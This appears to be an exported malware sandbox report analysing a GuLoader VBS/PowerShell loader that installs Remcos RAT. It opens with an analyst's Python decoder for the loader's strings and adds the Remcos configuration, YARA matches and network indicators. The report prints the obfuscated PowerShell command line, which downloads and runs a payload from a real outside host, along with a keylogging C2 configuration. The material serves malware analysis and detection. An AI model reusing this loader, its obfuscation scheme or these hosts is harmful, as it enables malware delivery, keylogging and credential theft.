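
$Fightet becomes 1 on a normal console host, so every 8th character (index 7, 15,
23, ...) is payload and the seven characters before it are junk.
"""
import re

# Matches `$Name=fyrstendmme '...'` with or without spaces around '='. The literals in
# this sample contain no single quotes, so a negated character class is sufficient.
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*fyrstendmme\s*'([^']*)'")


def decode(blob: str, step: int = 8, skip: int = 1) -> str:
    """Port of fyrstendmme: emit blob[7], blob[15], ... while the index is < len - skip."""
    return "".join(blob[i] for i in range(step - 1, len(blob) - skip, step))


def decode_assignments(script: str) -> dict:
    """Decode every `$Name=fyrstendmme '...'` literal in a script excerpt, keyed by Name."""
    return {name: decode(blob) for name, blob in ASSIGN_RE.findall(script)}


# Excerpt copied from the powershell.exe (PID 3516) command line in the report. The first
# literal is cut after 43 groups of eight because the report's copy of it loses sync
# beyond that point; the rest are complete.
SCRIPT_EXCERPT = (
    "$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangsl"
    "Copywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regn"
    "Spacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0"
    "elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;"
    "Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerE';"
    "$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprg"
    "MemoryleTelak cn ndtjentDesinfi ';"
    "$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/"
    "Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6"
    " Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklm"
    "Betonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehes"
    "Af,rydsnholden ';"
    "$Deutoxide=fyrstendmme 'Valgets>Bakteri ';"
    "$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';"
    "$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%"
    "Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\\ NonmitD"
    "Systemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericie"
    "Secondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent "
    "trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';"
)

if __name__ == "__main__":
    for name, value in decode_assignments(SCRIPT_EXCERPT).items():
        print(f"${name} = {value!r}")
```

Run stand-alone it prints the decoded assignments: `$Triangularize` is `iex`, `$Deutoxide` is `>`, `$Sorteringens` is `User-Agent`, `$Opholdsstuernes` starts with `Mozilla/5.0 (Windows NT 10.0; Win64; x64; ` (a Firefox user agent, which is what the "Uses a known web browser user agent" signature saw), `$Bombestoppets` is the cmd.exe echo line, and `$Bespake` is `http://103.237.86.247/Fremmeligste.xsn`, the stage-two download the loader fetches before the Remcos payload appears. That host is not the same address as the Remcos C2 `103.237.87.156:1993` in the extracted configuration, so both belong on the block list. The same decoder applies to any other GuLoader PowerShell stage that uses this scheme; only the stride, the helper name and the `$Fightet` offset vary between builds.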
Name: Remcos (RemcosRAT)
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution: APT33, The Gorgon Group, UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: CloudEyE (GuLoader)
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is XORed.
Attribution: none
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
Malware Configuration (Remcos)

{
  "Host:Port:Password": "103.237.87.156:1993:1",
  "Assigned name": "RemoteHost",
  "Connect interval": "1",
  "Install flag": "Disable",
  "Setup HKCU\\Run": "Enable",
  "Setup HKLM\\Run": "Enable",
  "Install path": "Application path",
  "Copy file": "remcos.exe",
  "Startup value": "Disable",
  "Hide file": "Disable",
  "Mutex": "Rmc-SACUXX",
  "Keylog flag": "1",
  "Keylog path": "Application path",
  "Keylog file": "logs.dat",
  "Keylog crypt": "Disable",
  "Hide keylog file": "Disable",
  "Screenshot flag": "Disable",
  "Screenshot time": "10",
  "Take Screenshot option": "Disable",
  "Take screenshot title": "",
  "Take screenshot time": "5",
  "Screenshot path": "AppData",
  "Screenshot file": "Screenshots",
  "Screenshot crypt": "Disable",
  "Mouse option": "Disable",
  "Delete file": "Disable",
  "Audio record time": "5"
}
Yara matches (dropped files)

Source: C:\ProgramData\remcos\logs.dat | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security

Yara matches (memory dumps)

Source: 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 0000000A.00000002.3384711680.00000000210CF000.00000004.00000010.00020000.00000000.sdmp | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 00000005.00000002.2523348220.0000000008E50000.00000040.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_GuLoader_5 | Description: Yara detected GuLoader | Author: Joe Security
Source: 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 0000000A.00000002.3365707907.0000000003B66000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_GuLoader_2 | Description: Yara detected GuLoader | Author: Joe Security
(10 further memory-dump matches are not reproduced in this export)
Yara matches (AMSI script buffers)

Source: amsi64_3516.amsi.csv | Rule: JoeSecurity_PowershellDownloadAndExecute | Description: Yara detected Powershell download and execute | Author: Joe Security
Source: amsi32_5512.amsi.csv | Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
Matched strings (offset into the AMSI buffer, identifier, content):
  • 0xef49:$b2: ::FromBase64String(
  • 0xdfc4:$s1: -join
  • 0x7770:$s4: +=
  • 0x7832:$s4: +=
  • 0xba59:$s4: +=
  • 0xdb76:$s4: +=
  • 0xde60:$s4: +=
  • 0xdfa6:$s4: +=
  • 0x179f9:$s4: +=
  • 0x17a79:$s4: +=
  • 0x17b3f:$s4: +=
  • 0x17bbf:$s4: +=
  • 0x17d95:$s4: +=
  • 0x17e19:$s4: +=
  • 0xe7ea:$e4: Get-WmiObject
  • 0xe9d9:$e4: Get-Process
  • 0xea31:$e4: Start-Process
  • 0x1868b:$e4: Get-Process

System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA.vbs", ProcessId: 768, ProcessName: wscript.exe
Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 1096, ParentProcessName: wab.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 6112, ProcessName: conhost.exe
Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA.vbs", ProcessId: 768, ProcessName: wscript.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens';If (${host}.CurrentCulture) {$Fightet++;}Function fyrstendmme($aldersforskellens){$Breddesekunder=$aldersforskellens.Length-$Fightet;$Energi='SUBsTRI';$Energi+='ng';For( $standsforskellenes=7;$standsforskellenes -lt $Breddesekunder;$standsforskellenes+=8){$Unblessed+=$aldersforskellens.$Energi.Invoke( $standsforskellenes, $Fightet);}$Unblessed;}function Illish($Phagedaena){ . ($Triangularize) ($Phagedaena);}$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangslCopywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regnSpacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerEntase v Undres:undecor1Fejlber2Phyllos1Martial.Konkurr0Fdevand)Yawlers AbioloGFemkroneVejrm.lckommandkBemyndio Ti skr/Vaaben.2 Relati0 Fanwr 1Flugtni0Gerning0Analyse1Udmanvr0Sidetal1Lin.les Appo,ehFCyk lbaiSamekhurcalioloeMoa lesfRester o,estselxUdsp ng/ Aandev1 asiali2Tubercl1,eperso. 
drydde0 Fogf,u ';$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6 Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklmBetonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehesAf,rydsnholden ';$Deutoxide=fyrstendmme 'Valgets>Bakteri ';$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';$Doozie='Medansvaret';$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\ NonmitDSystemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericieSecondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';Illish (fyrstendmme ' Pixm.p$GastroegTypot kl etreado Trachob Pse.doa hrynidl La.dsd:ForsnknDMimicaleAndalusb mirska,osmolat HalefieStandtirDidrach= Nati.n(Genaabnc Derre.mSteerlidKonomi. Arkivk/StoreslcInsu pa Futur m$MessersB

                Stealing of Sensitive Information

                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files (x86)\Windows Mail\wab.exe, ProcessId: 1096, TargetFilename: C:\ProgramData\remcos\logs.dat
                No Snort rule has matched

                AV Detection

                Source: 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "103.237.87.156:1993:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-SACUXX", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                Source: Yara matchFile source: 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3384711680.00000000210CF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: wab.exe PID: 1096, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Source: Submitted SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213610F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,10_2_213610F1
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21366580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,10_2_21366580
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0040AE51 FindFirstFileW,FindNextFileW,14_2_0040AE51
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407EF8
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,16_2_00407898

                Software Vulnerabilities

                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                Networking

                Source: Malware configuration extractorURLs: 103.237.87.156
                Source: global trafficTCP traffic: 192.168.2.6:49721 -> 103.237.87.156:1993
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                Source: Joe Sandbox ViewASN Name: BGNR-AP2BainandCompanySG BGNR-AP2BainandCompanySG
                Source: global trafficHTTP traffic detected: GET /Fremmeligste.xsn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.237.86.247Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /qOreedem137.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.237.86.247Cache-Control: no-cache
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: wab.exe, 0000000A.00000002.3384928445.0000000021330000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2587731823.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                Source: wab.exe, wab.exe, 00000010.00000002.2587731823.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                Source: wab.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                Source: wab.exe, 0000000E.00000002.2605351820.0000000004DA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                Source: wab.exe, 0000000E.00000002.2605351820.0000000004DA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                Source: wab.exe, 0000000A.00000002.3385163166.00000000217B0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                Source: wab.exe, 0000000A.00000002.3385163166.00000000217B0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.2
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.23
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.8
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.2
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.24
                Source: powershell.exe, 00000002.00000002.2570518162.000002848CE9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2570518162.000002848E57B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/F
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Fr
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Fre
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Frem
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Fremm
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Fremme
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Fremmel
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Fremmeli
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Fremmelig
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Fremmeligs
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Fremmeligst
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Fremmeligste
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Fremmeligste.
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Fremmeligste.x
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Fremmeligste.xs
                Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Fremmeligste.xsn
                Source: powershell.exe, 00000002.00000002.2570518162.000002848CE9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Fremmeligste.xsnP
                Source: powershell.exe, 00000005.00000002.2515114212.000000000537C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Fremmeligste.xsnXRbl038
                Source: wab.exe, 0000000A.00000002.3372008001.00000000057FB000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3384323626.0000000020930000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/qOreedem137.bin
                Source: wab.exe, 0000000A.00000002.3372008001.00000000057FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/qOreedem137.bin)
                Source: powershell.exe, 00000002.00000002.2570518162.000002848EA98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237H
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
                Source: wscript.exe, 00000000.00000003.2087476305.00000222CD3A2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2089840993.00000222CD3A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
                Source: wscript.exe, 00000000.00000003.2094914022.00000222CB4FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2096443101.00000222CB509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                Source: wscript.exe, 00000000.00000003.2094914022.00000222CB4FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094849673.00000222CB520000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2096463612.00000222CB521000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2096443101.00000222CB509000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
